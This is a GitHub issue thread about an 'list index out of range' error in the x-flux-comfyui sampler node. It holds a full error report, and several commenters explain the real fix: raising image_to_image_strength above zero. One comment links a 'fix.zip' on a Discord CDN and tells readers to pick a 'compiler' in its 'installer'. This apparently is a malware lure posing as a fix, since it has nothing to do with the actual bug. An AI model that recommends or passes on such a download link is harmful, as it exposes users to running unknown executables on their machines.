### ISSUE TITLE
Good day, get an list index out of range.

### ISSUE THREAD

**Issue by ZerefDeLaValier** [XLabs-AI/x-flux-comfyui#106]
Get list index out of range while try to execute workflow. Can somebody help?
[Uploading workflow.json…]()
`
# ComfyUI Error Report
## Error Details
- **Node Type:** XlabsSampler
- **Exception Type:** IndexError
- **Exception Message:** list index out of range
## Stack Trace
```
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)

  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui\nodes.py", line 379, in sampling
    x = denoise_controlnet(
        ^^^^^^^^^^^^^^^^^^^

  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui\sampling.py", line 256, in denoise_controlnet
    t = timesteps[t_idx]
        ~~~~~~~~~^^^^^^^

```
## System Information
- **ComfyUI Version:** v0.2.0
- **Arguments:** ComfyUI\main.py --windows-standalone-build
- **OS:** nt
- **Python Version:** 3.11.9 (tags/v3.11.9:de54cf5, Apr  2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)]
- **Embedded Python:** true
- **PyTorch Version:** 2.3.1+cu121
## Devices

- **Name:** cuda:0 NVIDIA GeForce RTX 4070 : cudaMallocAsync
  - **Type:** cuda
  - **VRAM Total:** 12877955072
  - **VRAM Free:** 206464288
  - **Torch VRAM Total:** 12280922112
  - **Torch VRAM Free:** 206464288

## Logs
```
2024-09-03 11:05:30,328 - root - INFO - Total VRAM 12281 MB, total RAM 32708 MB
2024-09-03 11:05:30,328 - root - INFO - pytorch version: 2.3.1+cu121
2024-09-03 11:05:30,329 - root - INFO - Set vram state to: NORMAL_VRAM
2024-09-03 11:05:30,330 - root - INFO - Device: cuda:0 NVIDIA GeForce RTX 4070 : cudaMallocAsync
2024-09-03 11:05:45,107 - root - INFO - Using pytorch cross attention
2024-09-03 11:05:53,971 - root - INFO - [Prompt Server] web root: F:\ComfyUI_windows_portable\ComfyUI\web
2024-09-03 11:06:05,747 - root - INFO - Total VRAM 12281 MB, total RAM 32708 MB
2024-09-03 11:06:05,748 - root - INFO - pytorch version: 2.3.1+cu121
2024-09-03 11:06:05,751 - root - INFO - Set vram state to: NORMAL_VRAM
2024-09-03 11:06:05,751 - root - INFO - Device: cuda:0 NVIDIA GeForce RTX 4070 : cudaMallocAsync
2024-09-03 11:06:13,022 - root - INFO - --------------
2024-09-03 11:06:13,023 - root - INFO - [91m ### Mixlab Nodes: [93mLoaded
2024-09-03 11:06:13,024 - root - INFO - ChatGPT.available True
2024-09-03 11:06:13,032 - root - INFO - edit_mask.available True
2024-09-03 11:06:13,917 - root - INFO - ClipInterrogator.available True
2024-09-03 11:06:15,262 - root - INFO - PromptGenerate.available True
2024-09-03 11:06:15,262 - root - INFO - ChinesePrompt.available True
2024-09-03 11:06:15,263 - root - INFO - RembgNode_.available True
2024-09-03 11:06:17,026 - root - INFO - TripoSR.available
2024-09-03 11:06:17,029 - root - INFO - MiniCPMNode.available
2024-09-03 11:06:17,030 - root - INFO - [93m -------------- [0m
2024-09-03 11:06:23,674 - root - INFO - 
Import times for custom nodes:
2024-09-03 11:06:23,674 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
2024-09-03 11:06:23,675 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\websocket_image_save.py
2024-09-03 11:06:23,676 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\sdxl_prompt_styler
2024-09-03 11:06:23,676 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_controlnet_aux
2024-09-03 11:06:23,676 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-WD14-Tagger
2024-09-03 11:06:23,677 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Eagle-PNGInfo
2024-09-03 11:06:23,677 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_essentials
2024-09-03 11:06:23,678 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_UltimateSDUpscale
2024-09-03 11:06:23,678 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-lama-remover
2024-09-03 11:06:23,679 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-KJNodes
2024-09-03 11:06:23,679 - root - INFO -    0.0 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Impact-Pack
2024-09-03 11:06:23,680 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyMath
2024-09-03 11:06:23,681 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\Derfuu_ComfyUI_ModdedNodes
2024-09-03 11:06:23,682 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
2024-09-03 11:06:23,682 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\rgthree-comfy
2024-09-03 11:06:23,683 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-IC-Light
2024-09-03 11:06:23,683 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_Comfyroll_CustomNodes
2024-09-03 11:06:23,684 - root - INFO -    0.1 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui
2024-09-03 11:06:23,685 - root - INFO -    0.2 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\CharacterFaceSwap
2024-09-03 11:06:23,685 - root - INFO -    0.3 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\Comfyui-ergouzi-Nodes
2024-09-03 11:06:23,686 - root - INFO -    0.5 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_LayerStyle
2024-09-03 11:06:23,686 - root - INFO -    0.7 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager
2024-09-03 11:06:23,687 - root - INFO -    2.3 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Image-Filters
2024-09-03 11:06:23,687 - root - INFO -    2.5 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Inspyrenet-Rembg
2024-09-03 11:06:23,688 - root - INFO -    2.8 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-BiRefNet-ZHO
2024-09-03 11:06:23,688 - root - INFO -    2.8 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui
2024-09-03 11:06:23,689 - root - INFO -    2.9 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-tbox
2024-09-03 11:06:23,689 - root - INFO -    2.9 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-art-venture
2024-09-03 11:06:23,690 - root - INFO -    5.7 seconds: F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes
2024-09-03 11:06:23,690 - root - INFO - 
2024-09-03 11:06:23,710 - root - INFO - 

2024-09-03 11:06:23,710 - root - INFO - 

Starting server
2024-09-03 11:06:23,713 - root - INFO - [93mTo see the GUI go to: http://10.10.100.80:8188 or http://127.0.0.1:8188
2024-09-03 11:06:23,715 - root - INFO - [93mTo see the GUI go to: https://10.10.100.80:8189 or https://127.0.0.1:8189[0m
2024-09-03 11:06:45,735 - root - INFO - got prompt
2024-09-03 11:06:46,337 - root - INFO - Using pytorch attention in VAE
2024-09-03 11:06:46,338 - root - INFO - Using pytorch attention in VAE
2024-09-03 11:06:47,262 - root - INFO - model weight dtype torch.float8_e4m3fn, manual cast: torch.bfloat16
2024-09-03 11:06:47,265 - root - INFO - model_type FLUX
2024-09-03 11:07:02,838 - root - WARNING - clip missing: ['text_projection.weight']
2024-09-03 11:07:25,251 - root - INFO - Requested to load FluxClipModel_
2024-09-03 11:07:25,253 - root - INFO - Loading 1 new model
2024-09-03 11:08:54,083 - root - INFO - loaded completely 0.0 9319.23095703125 True
2024-09-03 11:08:56,862 - root - INFO - Unloading models for lowram load.
2024-09-03 11:08:57,088 - root - INFO - 0 models unloaded.
2024-09-03 11:09:54,708 - root - INFO - Requested to load AutoencodingEngine
2024-09-03 11:09:54,708 - root - INFO - Loading 1 new model
2024-09-03 11:09:58,401 - root - INFO - loaded completely 0.0 159.87335777282715 True
2024-09-03 11:10:03,883 - root - INFO - Requested to load Flux
2024-09-03 11:10:03,883 - root - INFO - Loading 1 new model
2024-09-03 11:10:31,456 - root - INFO - loaded partially 6379.737320709229 6377.765686035156 0
2024-09-03 11:11:00,272 - root - INFO - Unloading models for lowram load.
2024-09-03 11:11:01,284 - root - INFO - 0 models unloaded.
2024-09-03 11:11:01,557 - root - ERROR - !!! Exception during processing !!! list index out of range
2024-09-03 11:11:01,682 - root - ERROR - Traceback (most recent call last):
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui\nodes.py", line 379, in sampling
    x = denoise_controlnet(
        ^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui\sampling.py", line 256, in denoise_controlnet
    t = timesteps[t_idx]
        ~~~~~~~~~^^^^^^^
IndexError: list index out of range

2024-09-03 11:11:01,685 - root - INFO - Prompt executed in 255.55 seconds
2024-09-03 11:11:29,856 - root - INFO - got prompt
2024-09-03 11:11:30,406 - root - INFO - Unloading models for lowram load.
2024-09-03 11:11:31,157 - root - INFO - 0 models unloaded.
2024-09-03 11:11:32,534 - root - INFO - Unloading models for lowram load.
2024-09-03 11:11:33,329 - root - INFO - 0 models unloaded.
2024-09-03 11:11:33,414 - root - ERROR - !!! Exception during processing !!! list index out of range
2024-09-03 11:11:33,416 - root - ERROR - Traceback (most recent call last):
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "F:\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui\nodes.py", line 379, in sampling
    x = denoise_controlnet(
        ^^^^^^^^^^^^^^^^^^^
  File "F:\ComfyUI_windows_portable\ComfyUI\custom_nodes\x-flux-comfyui\sampling.py", line 256, in denoise_controlnet
    t = timesteps[t_idx]
        ~~~~~~~~~^^^^^^^
IndexError: list index out of range

2024-09-03 11:11:33,543 - root - INFO - Prompt executed in 3.35 seconds
```
## Attached Workflow
Please make sure that workflow does not contain any sensitive information such as API keys or passwords.
```
Workflow too large. Please manually upload the workflow from local file system.
```

## Additional Context
(Please add any additional context or steps to reproduce the error here)
`

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by martintomov** [comment]
Same issue, didn't saw yours and opened a duplicate

**Comment by martintomov** [comment]
Same issue, didn't see yours and opened a duplicate

**Comment by leolis78ia** [comment]
same problem.  it seems to be an issue with the X-Labs Sampler when it receives the Latent from the VAE Encode. It seems that it does not accept the Pixels + Vae.

**Comment by martintomov** [comment]
as a fix, i started using InstantX's Controlnet. try it out:

Example by Comfy:
https://comfyanonymous.github.io/ComfyUI_examples/flux/?ref=blog.comfy.org#flux-controlnets

Model:
https://huggingface.co/InstantX/FLUX.1-dev-Controlnet-Union

![image](https://github.com/user-attachments/assets/7d27992a-6fb5-4c85-b44c-3c758f6f7eee)

**Comment by sunwei317** [comment]
changing the value of the image_to_image_strength to positive in the xlabs sampler solve the problem.

**Comment by MaraScott** [comment]
> changing the value of the image_to_image_strength to positive in the xlabs sampler solve the problem.

indeed, 0.0 do not work but from 0.1 it works fine

**Comment by valaxy** [comment]
what image_to_image_strength means?

**Comment by 1473725334** [comment]
一样的问题，在尝试解决，

**Comment by 1473725334** [comment]
找到一个可能解决的办法，不要用vae编码到later，空later尺寸给到1024X1024，似乎可以解决问题，

**Comment by cdmusic2019** [comment]
@sunwei317  You're right. Thank you very much.

**Comment by AiTools9** [comment]
latent_image: latent input for flux, may be empty latent or encoded with FLUX AE (VAE Encode) image (for image-to-image using)

The error occurs if you have an image input while the latent image value is set to 0. You must increase the image to image strength in order for the Sampler to be able to use it.
